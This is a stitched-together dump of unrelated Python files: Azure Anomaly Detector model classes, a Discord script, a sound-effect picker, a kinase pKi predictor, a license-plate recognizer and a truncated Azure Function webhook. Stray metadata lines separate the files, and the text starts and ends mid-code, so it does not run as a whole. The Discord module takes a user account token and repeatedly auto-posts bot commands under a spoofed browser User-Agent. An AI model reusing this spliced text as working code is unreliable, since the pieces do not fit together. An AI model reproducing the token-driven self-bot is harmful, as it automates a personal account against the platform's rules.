'results': {'key': 'results', 'type': '[AnomalyState]'},
}
def __init__(
self,
**kwargs
):
super(DetectionResult, self).__init__(**kwargs)
self.result_id = kwargs['result_id']
self.summary = kwargs['summary']
self.results = kwargs['results']
class DetectionResultSummary(msrest.serialization.Model):
"""DetectionResultSummary.
All required parameters must be populated in order to send to Azure.
:param status: Required. Multivariate anomaly detection status. Possible values include:
"CREATED", "RUNNING", "READY", "FAILED".
:type status: str or ~azure.ai.anomalydetector.models.DetectionStatus
    :param errors: Errors returned when creating or training the model fails.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
:param variable_states:
:type variable_states: list[~azure.ai.anomalydetector.models.VariableState]
:param setup_info: Required. Request when creating the model.
:type setup_info: ~azure.ai.anomalydetector.models.DetectionRequest
"""
_validation = {
'status': {'required': True},
'setup_info': {'required': True},
}
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
'variable_states': {'key': 'variableStates', 'type': '[VariableState]'},
'setup_info': {'key': 'setupInfo', 'type': 'DetectionRequest'},
}
def __init__(
self,
**kwargs
):
super(DetectionResultSummary, self).__init__(**kwargs)
self.status = kwargs['status']
self.errors = kwargs.get('errors', None)
self.variable_states = kwargs.get('variable_states', None)
self.setup_info = kwargs['setup_info']
class DetectRequest(msrest.serialization.Model):
"""DetectRequest.
All required parameters must be populated in order to send to Azure.
    :param series: Required. Time series data points. Points should be sorted by timestamp in
     ascending order to match the anomaly detection result. If the data is not sorted correctly or
     there are duplicated timestamps, the API will not work; in that case, an error message is
     returned.
:type series: list[~azure.ai.anomalydetector.models.TimeSeriesPoint]
:param granularity: Optional argument, can be one of yearly, monthly, weekly, daily, hourly,
minutely, secondly, microsecond or none. If granularity is not present, it will be none by
default. If granularity is none, the timestamp property in time series point can be absent.
Possible values include: "yearly", "monthly", "weekly", "daily", "hourly", "minutely",
"secondly", "microsecond", "none".
:type granularity: str or ~azure.ai.anomalydetector.models.TimeGranularity
    :param custom_interval: Custom Interval is used to set a non-standard time interval. For
     example, if the series is sampled every 5 minutes, the request can be set as
     {"granularity":"minutely", "customInterval":5}.
:type custom_interval: int
    :param period: Optional argument; the periodic value of a time series. If the value is null or
     not present, the API determines the period automatically.
:type period: int
:param max_anomaly_ratio: Optional argument, advanced model parameter, max anomaly ratio in a
time series.
:type max_anomaly_ratio: float
    :param sensitivity: Optional argument, advanced model parameter, between 0 and 99; the lower
     the value, the larger the margin, which means fewer anomalies will be accepted.
:type sensitivity: int
"""
_validation = {
'series': {'required': True},
}
_attribute_map = {
'series': {'key': 'series', 'type': '[TimeSeriesPoint]'},
'granularity': {'key': 'granularity', 'type': 'str'},
'custom_interval': {'key': 'customInterval', 'type': 'int'},
'period': {'key': 'period', 'type': 'int'},
'max_anomaly_ratio': {'key': 'maxAnomalyRatio', 'type': 'float'},
'sensitivity': {'key': 'sensitivity', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(DetectRequest, self).__init__(**kwargs)
self.series = kwargs['series']
self.granularity = kwargs.get('granularity', None)
self.custom_interval = kwargs.get('custom_interval', None)
self.period = kwargs.get('period', None)
self.max_anomaly_ratio = kwargs.get('max_anomaly_ratio', None)
self.sensitivity = kwargs.get('sensitivity', None)
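# A hedged usage sketch (illustration only, not part of the generated client code): it shows how
# the keyword arguments handled above map onto a request object. The timestamps and values are
# invented for illustration.
#
#   import datetime
#   series = [
#       TimeSeriesPoint(timestamp=datetime.datetime(2021, 1, 1) + datetime.timedelta(hours=h),
#                       value=float(h % 24))
#       for h in range(48)
#   ]
#   request = DetectRequest(series=series, granularity="hourly", sensitivity=95)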
class DiagnosticsInfo(msrest.serialization.Model):
"""DiagnosticsInfo.
:param model_state:
:type model_state: ~azure.ai.anomalydetector.models.ModelState
:param variable_states:
:type variable_states: list[~azure.ai.anomalydetector.models.VariableState]
"""
_attribute_map = {
'model_state': {'key': 'modelState', 'type': 'ModelState'},
'variable_states': {'key': 'variableStates', 'type': '[VariableState]'},
}
def __init__(
self,
**kwargs
):
super(DiagnosticsInfo, self).__init__(**kwargs)
self.model_state = kwargs.get('model_state', None)
self.variable_states = kwargs.get('variable_states', None)
class EntireDetectResponse(msrest.serialization.Model):
"""EntireDetectResponse.
All required parameters must be populated in order to send to Azure.
:param period: Required. Frequency extracted from the series, zero means no recurrent pattern
has been found.
:type period: int
:param expected_values: Required. ExpectedValues contain expected value for each input point.
The index of the array is consistent with the input series.
:type expected_values: list[float]
    :param upper_margins: Required. UpperMargins contain the upper margin of each input point.
     UpperMargin is used to calculate upperBoundary, which equals expectedValue + (100 -
     marginScale)*upperMargin. Anomalies in the response can be filtered by upperBoundary and
     lowerBoundary. By adjusting the marginScale value, less significant anomalies can be filtered
     out on the client side. The index of the array is consistent with the input series.
:type upper_margins: list[float]
    :param lower_margins: Required. LowerMargins contain the lower margin of each input point.
     LowerMargin is used to calculate lowerBoundary, which equals expectedValue - (100 -
     marginScale)*lowerMargin. Points between the boundaries can be marked as normal on the client
     side. The index of the array is consistent with the input series.
:type lower_margins: list[float]
:param is_anomaly: Required. IsAnomaly contains anomaly properties for each input point. True
means an anomaly either negative or positive has been detected. The index of the array is
consistent with the input series.
:type is_anomaly: list[bool]
:param is_negative_anomaly: Required. IsNegativeAnomaly contains anomaly status in negative
direction for each input point. True means a negative anomaly has been detected. A negative
anomaly means the point is detected as an anomaly and its real value is smaller than the
expected one. The index of the array is consistent with the input series.
:type is_negative_anomaly: list[bool]
    :param is_positive_anomaly: Required. IsPositiveAnomaly contains anomaly status in positive
direction for each input point. True means a positive anomaly has been detected. A positive
anomaly means the point is detected as an anomaly and its real value is larger than the
expected one. The index of the array is consistent with the input series.
:type is_positive_anomaly: list[bool]
"""
_validation = {
'period': {'required': True},
'expected_values': {'required': True},
'upper_margins': {'required': True},
'lower_margins': {'required': True},
'is_anomaly': {'required': True},
'is_negative_anomaly': {'required': True},
'is_positive_anomaly': {'required': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'expected_values': {'key': 'expectedValues', 'type': '[float]'},
'upper_margins': {'key': 'upperMargins', 'type': '[float]'},
'lower_margins': {'key': 'lowerMargins', 'type': '[float]'},
'is_anomaly': {'key': 'isAnomaly', 'type': '[bool]'},
'is_negative_anomaly': {'key': 'isNegativeAnomaly', 'type': '[bool]'},
'is_positive_anomaly': {'key': 'isPositiveAnomaly', 'type': '[bool]'},
}
def __init__(
self,
**kwargs
):
super(EntireDetectResponse, self).__init__(**kwargs)
self.period = kwargs['period']
self.expected_values = kwargs['expected_values']
self.upper_margins = kwargs['upper_margins']
self.lower_margins = kwargs['lower_margins']
self.is_anomaly = kwargs['is_anomaly']
self.is_negative_anomaly = kwargs['is_negative_anomaly']
self.is_positive_anomaly = kwargs['is_positive_anomaly']
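# An illustrative sketch of the client-side boundary math described in the docstring above; the
# marginScale value is an arbitrary client-chosen number, not an API field.
#
#   margin_scale = 95
#   upper = [e + (100 - margin_scale) * m for e, m in zip(resp.expected_values, resp.upper_margins)]
#   lower = [e - (100 - margin_scale) * m for e, m in zip(resp.expected_values, resp.lower_margins)]
#   # A flagged point i can be treated as normal on the client side when
#   # lower[i] <= observed_value[i] <= upper[i].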
class ErrorResponse(msrest.serialization.Model):
"""ErrorResponse.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error Code.
:type code: str
:param message: Required. A message explaining the error reported by the service.
:type message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = kwargs['code']
self.message = kwargs['message']
class LastDetectResponse(msrest.serialization.Model):
"""LastDetectResponse.
All required parameters must be populated in order to send to Azure.
:param period: Required. Frequency extracted from the series, zero means no recurrent pattern
has been found.
:type period: int
:param suggested_window: Required. Suggested input series points needed for detecting the
latest point.
:type suggested_window: int
:param expected_value: Required. Expected value of the latest point.
:type expected_value: float
    :param upper_margin: Required. Upper margin of the latest point. UpperMargin is used to
     calculate upperBoundary, which equals expectedValue + (100 - marginScale)*upperMargin. If the
     value of the latest point is between upperBoundary and lowerBoundary, it should be treated as
     a normal value. By adjusting the marginScale value, the anomaly status of the latest point can
     be changed.
:type upper_margin: float
    :param lower_margin: Required. Lower margin of the latest point. LowerMargin is used to
     calculate lowerBoundary, which equals expectedValue - (100 - marginScale)*lowerMargin.
:type lower_margin: float
:param is_anomaly: Required. Anomaly status of the latest point, true means the latest point is
an anomaly either in negative direction or positive direction.
:type is_anomaly: bool
:param is_negative_anomaly: Required. Anomaly status in negative direction of the latest point.
True means the latest point is an anomaly and its real value is smaller than the expected one.
:type is_negative_anomaly: bool
:param is_positive_anomaly: Required. Anomaly status in positive direction of the latest point.
True means the latest point is an anomaly and its real value is larger than the expected one.
:type is_positive_anomaly: bool
"""
_validation = {
'period': {'required': True},
'suggested_window': {'required': True},
'expected_value': {'required': True},
'upper_margin': {'required': True},
'lower_margin': {'required': True},
'is_anomaly': {'required': True},
'is_negative_anomaly': {'required': True},
'is_positive_anomaly': {'required': True},
}
_attribute_map = {
'period': {'key': 'period', 'type': 'int'},
'suggested_window': {'key': 'suggestedWindow', 'type': 'int'},
'expected_value': {'key': 'expectedValue', 'type': 'float'},
'upper_margin': {'key': 'upperMargin', 'type': 'float'},
'lower_margin': {'key': 'lowerMargin', 'type': 'float'},
'is_anomaly': {'key': 'isAnomaly', 'type': 'bool'},
'is_negative_anomaly': {'key': 'isNegativeAnomaly', 'type': 'bool'},
'is_positive_anomaly': {'key': 'isPositiveAnomaly', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(LastDetectResponse, self).__init__(**kwargs)
self.period = kwargs['period']
self.suggested_window = kwargs['suggested_window']
self.expected_value = kwargs['expected_value']
self.upper_margin = kwargs['upper_margin']
self.lower_margin = kwargs['lower_margin']
self.is_anomaly = kwargs['is_anomaly']
self.is_negative_anomaly = kwargs['is_negative_anomaly']
self.is_positive_anomaly = kwargs['is_positive_anomaly']
class Model(msrest.serialization.Model):
"""Response of get model.
All required parameters must be populated in order to send to Azure.
:param model_id: Required. Model identifier.
:type model_id: str
:param created_time: Required. Date and time (UTC) when the model was created.
:type created_time: ~datetime.datetime
:param last_updated_time: Required. Date and time (UTC) when the model was last updated.
:type last_updated_time: ~datetime.datetime
:param model_info: Training Status of the model.
:type model_info: ~azure.ai.anomalydetector.models.ModelInfo
"""
_validation = {
'model_id': {'required': True},
'created_time': {'required': True},
'last_updated_time': {'required': True},
}
_attribute_map = {
'model_id': {'key': 'modelId', 'type': 'str'},
'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
'last_updated_time': {'key': 'lastUpdatedTime', 'type': 'iso-8601'},
'model_info': {'key': 'modelInfo', 'type': 'ModelInfo'},
}
def __init__(
self,
**kwargs
):
super(Model, self).__init__(**kwargs)
self.model_id = kwargs['model_id']
self.created_time = kwargs['created_time']
self.last_updated_time = kwargs['last_updated_time']
self.model_info = kwargs.get('model_info', None)
class ModelInfo(msrest.serialization.Model):
"""Train result of a model including status, errors and diagnose info for model and variables.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param sliding_window: An optional field indicating how many history points are used to
     determine the anomaly score of a subsequent point.
:type sliding_window: int
    :param align_policy: An optional field; the multivariate series need to be aligned on the same
     timestamps before detection starts.
:type align_policy: ~azure.ai.anomalydetector.models.AlignPolicy
    :param source: Required. Source file link of the input variables. Each variable is a CSV file
     with two columns, where the first column is the timestamp and the second column is the value.
     Besides these variable CSV files, an extra meta.json can be included in the zip file if you
     would like to rename a variable. By default, the file name of the variable is used as the
     variable name.
:type source: str
    :param start_time: Required. The start time of the data used for generating the multivariate
     anomaly detection model, formatted as date-time.
:type start_time: ~datetime.datetime
    :param end_time: Required. The end time of the data used for generating the multivariate
     anomaly detection model, formatted as date-time.
:type end_time: ~datetime.datetime
    :param display_name: An optional field; the name of the model.
:type display_name: str
:ivar status: Model training status. Possible values include: "CREATED", "RUNNING", "READY",
"FAILED".
:vartype status: str or ~azure.ai.anomalydetector.models.ModelStatus
    :ivar errors: Errors encountered when model creation fails.
:vartype errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
    :ivar diagnostics_info: Used for deep analysis of the model and variables.
:vartype diagnostics_info: ~azure.ai.anomalydetector.models.DiagnosticsInfo
"""
_validation = {
'source': {'required': True},
'start_time': {'required': True},
'end_time': {'required': True},
'display_name': {'max_length': 24, 'min_length': 0},
'status': {'readonly': True},
'errors': {'readonly': True},
'diagnostics_info': {'readonly': True},
}
_attribute_map = {
'sliding_window': {'key': 'slidingWindow', 'type': 'int'},
'align_policy': {'key': 'alignPolicy', 'type': 'AlignPolicy'},
'source': {'key': 'source', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'display_name': {'key': 'displayName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
'diagnostics_info': {'key': 'diagnosticsInfo', 'type': 'DiagnosticsInfo'},
}
def __init__(
self,
**kwargs
):
super(ModelInfo, self).__init__(**kwargs)
self.sliding_window = kwargs.get('sliding_window', None)
self.align_policy = kwargs.get('align_policy', None)
self.source = kwargs['source']
self.start_time = kwargs['start_time']
self.end_time = kwargs['end_time']
self.display_name = kwargs.get('display_name', None)
self.status = None
self.errors = None
self.diagnostics_info = None
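# A hedged sketch of building a training request with the model above; the blob URL, dates and
# display name are placeholders, and fill_na_method="Linear" is one of the FillNAMethod values
# listed for AlignPolicy.
#
#   import datetime
#   model_info = ModelInfo(
#       source="https://<account>.blob.core.windows.net/<container>/variables.zip?<sas-token>",
#       start_time=datetime.datetime(2021, 1, 1),
#       end_time=datetime.datetime(2021, 2, 1),
#       sliding_window=200,
#       align_policy=AlignPolicy(fill_na_method="Linear"),
#       display_name="sample-model",
#   )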
class ModelList(msrest.serialization.Model):
"""Response to the list models operation.
All required parameters must be populated in order to send to Azure.
:param models: Required. List of models.
:type models: list[~azure.ai.anomalydetector.models.ModelSnapshot]
:param current_count: Required. Current count of trained multivariate models.
:type current_count: int
:param max_count: Required. Max number of models that can be trained for this subscription.
:type max_count: int
:param next_link: next link to fetch more models.
:type next_link: str
"""
_validation = {
'models': {'required': True},
'current_count': {'required': True},
'max_count': {'required': True},
}
_attribute_map = {
'models': {'key': 'models', 'type': '[ModelSnapshot]'},
'current_count': {'key': 'currentCount', 'type': 'int'},
'max_count': {'key': 'maxCount', 'type': 'int'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ModelList, self).__init__(**kwargs)
self.models = kwargs['models']
self.current_count = kwargs['current_count']
self.max_count = kwargs['max_count']
self.next_link = kwargs.get('next_link', None)
class ModelSnapshot(msrest.serialization.Model):
"""ModelSnapshot.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param model_id: Required. Model identifier.
:type model_id: str
:param created_time: Required. Date and time (UTC) when the model was created.
:type created_time: ~datetime.datetime
:param last_updated_time: Required. Date and time (UTC) when the model was last updated.
:type last_updated_time: ~datetime.datetime
:ivar status: Required. Model training status. Possible values include: "CREATED", "RUNNING",
"READY", "FAILED".
:vartype status: str or ~azure.ai.anomalydetector.models.ModelStatus
:param display_name:
:type display_name: str
:param variables_count: Required. Count of variables.
:type variables_count: int
"""
_validation = {
'model_id': {'required': True},
'created_time': {'required': True},
'last_updated_time': {'required': True},
'status': {'required': True, 'readonly': True},
'variables_count': {'required': True},
}
_attribute_map = {
'model_id': {'key': 'modelId', 'type': 'str'},
'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
'last_updated_time': {'key': 'lastUpdatedTime', 'type': 'iso-8601'},
'status': {'key': 'status', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'variables_count': {'key': 'variablesCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(ModelSnapshot, self).__init__(**kwargs)
self.model_id = kwargs['model_id']
self.created_time = kwargs['created_time']
self.last_updated_time = kwargs['last_updated_time']
self.status = None
self.display_name = kwargs.get('display_name', None)
self.variables_count = kwargs['variables_count']
class ModelState(msrest.serialization.Model):
"""ModelState.
:param epoch_ids: Epoch id.
:type epoch_ids: list[int]
:param train_losses:
:type train_losses: list[float]
:param validation_losses:
:type validation_losses: list[float]
:param latencies_in_seconds:
:type latencies_in_seconds: list[float]
"""
_attribute_map = {
'epoch_ids': {'key': 'epochIds', 'type': '[int]'},
'train_losses': {'key': 'trainLosses', 'type': '[float]'},
'validation_losses': {'key': 'validationLosses', 'type': '[float]'},
'latencies_in_seconds': {'key': 'latenciesInSeconds', 'type': '[float]'},
}
def __init__(
self,
**kwargs
):
super(ModelState, self).__init__(**kwargs)
self.epoch_ids = kwargs.get('epoch_ids', None)
self.train_losses = kwargs.get('train_losses', None)
self.validation_losses = kwargs.get('validation_losses', None)
self.latencies_in_seconds = kwargs.get('latencies_in_seconds', None)
class TimeSeriesPoint(msrest.serialization.Model):
"""TimeSeriesPoint.
All required parameters must be populated in order to send to Azure.
:param timestamp: Optional argument, timestamp of a data point (ISO8601 format).
:type timestamp: ~datetime.datetime
    :param value: Required. The measurement of that point; should be a float.
:type value: float
"""
_validation = {
'value': {'required': True},
}
_attribute_map = {
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(TimeSeriesPoint, self).__init__(**kwargs)
self.timestamp = kwargs.get('timestamp', None)
self.value = kwargs['value']
class VariableState(msrest.serialization.Model):
"""VariableState.
:param variable: Variable name.
:type variable: str
:param filled_na_ratio: Merged NA ratio of a variable.
:type filled_na_ratio: float
:param effective_count: Effective time-series points count.
:type effective_count: int
:param start_time: Start time of a variable.
:type start_time: ~datetime.datetime
:param end_time: End time of a variable.
:type end_time: ~datetime.datetime
    :param errors: Errors encountered when parsing the variable.
:type errors: list[~azure.ai.anomalydetector.models.ErrorResponse]
"""
_validation = {
'filled_na_ratio': {'maximum': 1, 'minimum': 0},
}
_attribute_map = {
'variable': {'key': 'variable', 'type': 'str'},
'filled_na_ratio': {'key': 'filledNARatio', 'type': 'float'},
'effective_count': {'key': 'effectiveCount', 'type': 'int'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'errors': {'key': 'errors', 'type': '[ErrorResponse]'},
}
def __init__(
self,
**kwargs
):
super(VariableState, self).__init__(**kwargs)
self.variable = kwargs.get('variable', None)
self.filled_na_ratio = kwargs.get('filled_na_ratio', None)
self.effective_count = kwargs.get('effective_count', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.errors = kwargs.get('errors', None)
| 2.0625 | 2 |
modules/dankMemer.py | YottGG/The-all-in-one-discord-tool | 0 | 12786273 | from colored import fg, attr
import requests
import threading
import time
import random
r = fg(241) # Setup color variables
r2 = fg(255)
b = fg(31)
w = fg(15)
def start():
token = input(f"\n {r2}[{b}?{r2}] Token: ")
channel = input(f" {r2}[{b}?{r2}] Channel Id: ")
def execute_command(command = "", cooldown = 0):
print(f"{r2}[{b}!{r2} Loaded: '{command}' With cooldown of {cooldown} Seconds")
while True:
requests.post(
f"https://discord.com/api/channels/{channel}/messages",
data = {'content': command},
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
)
print(f"{r2}[{b}+{r2}] '{command}' Ran successfully")
time.sleep(cooldown + random.randint(2, 10))
commands = {
"pls beg" : 45,
"pls hunt" : 40,
"pls fish" : 40,
"pls daily" : 86400
}
print()
for cmd, cooldown in commands.items():
threading.Thread(target = execute_command, kwargs = {"command" : cmd, "cooldown" : cooldown}).start()
time.sleep(5)
| 2.609375 | 3 |
sound_stuff.py | VarunBabbar/Stroodle | 0 | 12786274 | <gh_stars>0
from nltk.stem import PorterStemmer
#from nltk.tokenize import sent_tokenize, word_tokenize
# TODO: Word2Vec
# Names
names = ["John", "Donald"]
# colours
colours = ["red", "blue", "green", "yellow", "orange", "pink", "purple"]
# key story phrases
story_phrases = ["Once upon a time", "time"]
# kinematic action words
kinematics = ["walking", "running", "jumping", "skipping"]
# short clip sound effects - dictionary
sound_effects = {"thunder":"Storm_exclamation_wav.wav",
"lion":"European_Dragon_Roaring_and_breathe_fire-daniel-simon_wav.wav",
"dancing": "despacito.wav",
"dancing.": "despacito.wav",
"dance": "despacito.wav",
"thank you": "wish_you.wav",
"Christmas": "wish_you.wav",
"Christmas.": "wish_you.wav",
"warrior":" ",
"fire":" "}
# audio clips
negative_music = 'Beethoven-MoonlightSonata_wav.wav'
positive_music = 'SCOTT_JOPLIN_The_Entertainer_wav.wav'
def remove_unwanted_words(search_term):
search_list = search_term.split(' ')
for i in search_list:
if i in colours or i in names or i in story_phrases:
search_list.remove(i)
search_term = ' '.join(search_list)
#print(search_term)
return search_term
def which_background_audio(sentiment):
#
# #sentiment - tuple (value, type) - HIGHEST amongst all
# # keywords is a list
# audio_clip = ' '
#
# #if (sentiment[1] == 'Neutral' or sentiment[1] == 'Mixed'):
# # pass
#
# if sentiment[1] == 'Negative':
#
if (sentiment[1] == 'Positive'):
return positive_music
else:
return negative_music
def which_sound_effect(search_term):
keywords = search_term.split(' ')
ps = PorterStemmer()
#print(sound_effects.keys)
    audio_clip = ' '  # default so the return value is defined when no keyword matches
    try:
for word in keywords:
print(ps.stem(word))
if ps.stem(word) in sound_effects.keys():
key = ps.stem(word)
audio_clip = sound_effects[key]
#print(audio_clip)
except:
audio_clip = ' '
return audio_clip
#print(which_sound_effect('thunder waits'))
#remove_unwanted_words('red dragon thunder')
#print(which_background_audio(0.5))
| 2.875 | 3 |
get_kinase_pki.py | sirimullalab/kinasepkipred | 10 | 12786275 | from __future__ import print_function, absolute_import
# Script to predict (or test) the model using protein (kinase) sequence and SMILE pattern of a compound.
# Usage: python2 get_kinase_pki.py protein_sequence "SMILE_Pattern"
import numpy as np
from pydpi.pypro import PyPro
import pandas as pd
import json
import multiprocessing as mp
import os
import sys
from sklearn.externals import joblib
from utility import FeatureGenerator
#from keras.models import load_model
import pickle
class pKiPred(object):
def __init__(self):
self.model = joblib.load(os.path.join(os.path.dirname(__file__), 'Random_forest_gridsearch_py27.mdl'))
def get_smi_features(self, smiles):
try:
feat_gen = FeatureGenerator(smiles)
features = feat_gen.toTPATF()
return features
except:
return None
def get_features(self, seq, smi):
p = PyPro()
try:
p.ReadProteinSequence(seq)
features = list(p.GetALL().values())
smi_features = self.get_smi_features(smi)
smi_features2 = list(np.array([f for f in smi_features], dtype=np.float32))
total_features = np.array(features+smi_features2)[np.newaxis, :]
# total_features = np.array(smi_features2+features)[np.newaxis, :] # does not work...!
return total_features
except Exception as e:
print(str(e))
return None
def predict(self, seq, smi):
protein_feature = self.get_features(seq, smi)
return self.model.predict(protein_feature)
def main():
seq = "MGCGCSSHPEDDWMENIDVCENCHYPIVPLDGKGTLLIRNGSEVRDPLVTYEGSNPPASPLQDNLVIALHSYEPSHDGDLGFEKGEQLRILEQSGEWWKAQSLTTGQEGFIPFNFVAKANSLEPEPWFFK<KEY>"
smile = "CC(C)Oc1ccc(cc1Cl)c2noc(n2)c3ccc(N[C@H]4CC[C@H](C4)C(=O)O)cc3"
pkipred = pKiPred()
if len(sys.argv) == 1:
print(pkipred.predict(seq, smile))
else:
print(pkipred.predict(sys.argv[1], sys.argv[2]))
if __name__=="__main__":
main()
| 2.4375 | 2 |
src/plate.py | webdesign4site/License-Plate-Recognition-Using-Deep-Learning | 2 | 12786276 | from keras.models import load_model
from keras.preprocessing import image
import numpy as np
import cv2
from keras.backend import tensorflow_backend as K
import os
import glob
import time
import keras
from matplotlib import pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K2
#IOU calc
iou_smooth=1.
# Input sizes required for plate detection with U-Net
img_width, img_height = 256, 256
char_list = ["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","R","S","T","U","V","Y","Z","X","W"]
# Loss function required by U-Net; computes the loss from the intersection (IoU) area
def IOU_calc(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return 2*(intersection + iou_smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + iou_smooth)
def IOU_calc_loss(y_true, y_pred):
return 1-IOU_calc(y_true, y_pred)
# For ordering the characters on the plate; compares characters by their widths
def compareRectWidth(a,b):
return a < b
# Loads the U-Net model
model_unet = load_model('../src/gumruk_unetGU002.h5',custom_objects={'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc})
# Loads the CNN model for character recognition
# Input sizes of the CNN model
img_rows, img_cols = 28, 28
batch_size = 128
num_classes = 35
epochs = 12
if K2.image_data_format() == 'channels_first':
input_shape = (1, img_rows, img_cols)
else:
input_shape = (img_rows, img_cols, 1)
model_cnn = Sequential()
model_cnn.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model_cnn.add(Conv2D(64, (3, 3), activation='relu'))
model_cnn.add(MaxPooling2D(pool_size=(2, 2)))
model_cnn.add(Dropout(0.25))
model_cnn.add(Flatten())
model_cnn.add(Dense(128, activation='relu'))
model_cnn.add(Dropout(0.5))
model_cnn.add(Dense(num_classes, activation='softmax'))
model_cnn.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model_cnn.load_weights('../src/mert_cnn.h5')
# Finds the plate with U-Net and returns it; takes an image path as input
def getPlateImage(filepath):
image = cv2.imread(filepath)
plate = image
originalImage = image
    ## Prepares the input size required by the model
image = cv2.resize(image, (256, 256)).astype("float32")
image = np.expand_dims(image, axis=0)
    # Prediction returns a binary image
pred = model_unet.predict(image)
pred = pred.reshape((256,256,1))
pred = pred.astype(np.float32)
pred = pred*255
pred = cv2.resize(pred, (originalImage.shape[1], originalImage.shape[0]))
pred=np.uint8(pred)
    # Takes the largest white area in the image (the plate location) and crops it
contours, hierarchy = cv2.findContours(pred,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
largestArea = 0
for contour in contours:
tArea = cv2.contourArea(contour)
if tArea > largestArea:
largestArea = tArea
x,y,w,h = cv2.boundingRect(contour)
if largestArea > 0:
plate = originalImage[y:y+h,x:x+w]
else:
print("PLATE COULD NOT FOUND")
return plate
# Takes the plate image and returns the recognized characters
def getPlateString(plate):
grayPlate = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
roiList = []
wList = []
charList = []
retval, binary = cv2.threshold(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY+cv2.THRESH_OTSU)
contours,hierarchy = cv2.findContours(binary,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
idx =0
plateStr = []
for cnt in contours:
idx += 1
x,y,w,h = cv2.boundingRect(cnt)
roi=plate[y:y+h,x:x+w]
if w > 15 and h > 30 and w <100 and h< 100:
roiList.append(roi)
wList.append(x)
#cv2.imwrite("/home/utku/Desktop/rois/" + str(idx) +".jpg", roi)
#cv2.waitKey(100)
#predict roi, resize may needed
#roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
roi = np.asarray(roi)
roi = np.resize(roi, (28,28))
if K2.image_data_format() == 'channels_first':
roi = roi.reshape(roi.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
roi = roi.reshape(1, img_rows, img_cols, 1)
#roi = np.resize(roi, (28,28,1))
#roi = np.expand_dims(roi, axis=0)
roi = roi/255
pred = model_cnn.predict(roi)
#get index
print("pred: ", pred)
predd = pred[0]
char_idx = np.argmax(predd)
            #char_idx = np.where(predd == 1)  ## index of the element equal to 1
plate_char = char_list[char_idx];
#append result to plateStr, may map the predict to a char(BUT HOW)
plateStr.append(plate_char)
print("plate_char is: ", plate_char)
#break
#sorting from left to right
charList = [x for _,x in sorted(zip(wList,plateStr))]
return charList
#plate = getPlateImage("sampleplate.jpg")
#plateString = getPlateString(plate)
#if 'X' in plateString: plateString.remove('X')
#print("plateString: ", plateString)
| 2.6875 | 3 |
AzureFunctions/tcr_notification/__init__.py | tobiheim/teams-call-records-api | 2 | 12786277 | <gh_stars>1-10
"""
Description:
Web-Hook to collect Call Id's and write them to a Service Bus
Disclaimer:
    This code is provided AS IS without warranty of any kind. The author disclaims all implied warranties including,
    without limitation, any implied warranties of merchantability or of fitness for a particular purpose.
    The entire risk arising out of the use or performance remains with you. In no event will the author be liable
    for any damages whatsoever (including, without limitation, damages for loss of business profits, business interruption,
    loss of business information, or other pecuniary loss) arising out of the use of or inability to use the code.
Known issues:
"""
import logging
import urllib.parse
import json
import os
import sys
import azure.functions as func
from __app__.sb_eh_helper.sb_eh_helper import sbHelper
import __app__.constants.constants as constants
# Check query results and write to Service Bus
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
result = str()
validationToken = req.params.get('validationToken')
if not validationToken:
try:
req_body = json.dumps(req.get_json())
except ValueError:
req_body = None
logging.info('Send Call-ID to Azure Service Bus: %s', constants.SB_CONNECTION_STR)
sb_sender = sbHelper(constants.SB_CONNECTION_STR, constants.TOPIC_NAME, constants.SUBSCRIPTION_NAME)
try:
sb_sender.sb_send(req_body)
except:
sys.exit('Failed to send Call-ID to Azure Service Bus')
return func.HttpResponse(
